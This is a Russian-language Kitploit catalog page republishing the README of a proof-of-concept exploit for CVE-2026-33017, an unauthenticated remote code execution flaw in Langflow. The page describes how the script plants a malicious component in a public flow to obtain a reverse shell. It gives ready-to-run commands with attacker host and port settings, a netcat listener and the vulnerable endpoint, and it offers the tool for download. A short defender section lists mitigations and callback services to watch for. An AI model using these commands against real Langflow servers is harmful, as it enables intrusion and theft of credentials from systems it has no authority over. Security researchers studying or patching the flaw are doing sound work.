Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-33017-Langflop — CVE-2026-33017 Langflow RCE PoC | Kitploit
Инструменты/GitHubGitHub/tatosec/cve-2026-33017-langflop
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеРазработка Полезной Нагрузки
GitHubtatosec/cve-2026-33017-langflop

CVE-2026-33017-Langflop

CVE-2026-33017 Langflow RCE PoC

Репозиторий
31 месяц назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-33017 Langflow («Langflop») Unauth RCE PoC

PoC для неаутентифицированной уязвимости build_public_tmp, позволяющей выполнять код в Langflow. Он загружает вредоносный компонент в публичный флоу, запускает сборку и перехватывает reverse shell.

Только для авторизованного тестирования безопасности. Используйте только против систем, которыми вы владеете или на тестирование которых у вас есть явное разрешение.

Требования

  • Python 3
  • requests (pip install requests)

Использование

Запустите встроенный слушатель и активируйте эксплойт одной командой:

root@kitploit:~
python3 poc.py \
  --url https://target:7860 \
  --flow-id <public-flow-uuid> \
  --lhost <your-ip> \
  --lport 4444 \
  --listen

Когда shell подключится, он автоматически попытается повыситься до полностью интерактивного shell.

Если вы предпочитаете использовать собственный слушатель (например, nc -lvnp 4444), уберите :

Скачать инструмент
--listen
root@kitploit:~
python3 poc.py --url https://target:7860 --flow-id <uuid> --lhost <your-ip> --lport 4444

Параметры

ФлагОписание
--urlURL целевого сервера Langflow (обязательно)
--flow-idUUID общего публичного флоу (обязательно)
--lhostIP-адрес для обратного вызова reverse shell (обязательно)
--lportПорт для обратного вызова reverse shell (обязательно)
--listenЗапустить встроенный слушатель
--timeoutТаймаут HTTP-запроса в секундах (по умолчанию 30)
-k, --insecureОтключить проверку TLS-сертификатов (самоподписанные / просроченные сертификаты)
--no-upgradeПропустить автоматическое повышение до TTY, использовать простой строчный shell

Информация

CVE-2026-33017 — это неаутентифицированная RCE в конечной точке Langflow POST /api/v1/build_public_tmp/{flow_id}/flow, которая выполняет переданный атакующим Python-код из определений узлов флоу без песочницы. Чтобы узнать больше, ознакомьтесь с материалами ниже:

  • Аналитический отчет Sysdig Threat Research: CVE-2026-33017: How attackers compromised Langflow AI pipelines in 20 hours
  • NVD: CVE-2026-33017

Рекомендации (для защитников)

Меры по смягчению последствий из отчета Sysdig Threat Research:

  • Обновите Langflow немедленно. Если исправленная версия ещё недоступна, ограничьте сетевой доступ к конечной точке /api/v1/build_public_tmp или полностью отключите сборку публичных флоу.
  • Проверьте переменные окружения и секреты на любом публично доступном экземпляре Langflow. В качестве меры предосторожности перевыпустите API-ключи, пароли баз данных и облачные учётные данные.
  • Отслеживайте исходящие подключения к необычным портам или известным сервисам обратного вызова (oastify.com, interact.sh, dnslog.cn), которые указывают на активную эксплуатацию и утечку данных.
  • Ограничьте сетевой доступ к экземплярам Langflow с помощью правил межсетевого экрана или обратного прокси с аутентификацией. !!Langflow не должен быть напрямую доступен из интернета без уровня аутентификации!!
  • Проведите инвентаризацию AI/ML-инструментов в вашей среде. Такие платформы, как Langflow, n8n и другие инструменты автоматизации рабочих процессов, всё чаще становятся целями, поскольку они часто работают с широким доступом к API и развертываются вне стандартных процессов проверки безопасности.

Дисклеймер

Этот инструмент предоставлен для исследований и авторизованного тестирования на проникновение. Автор не несёт ответственности за неправомерное использование или причинённый ущерб.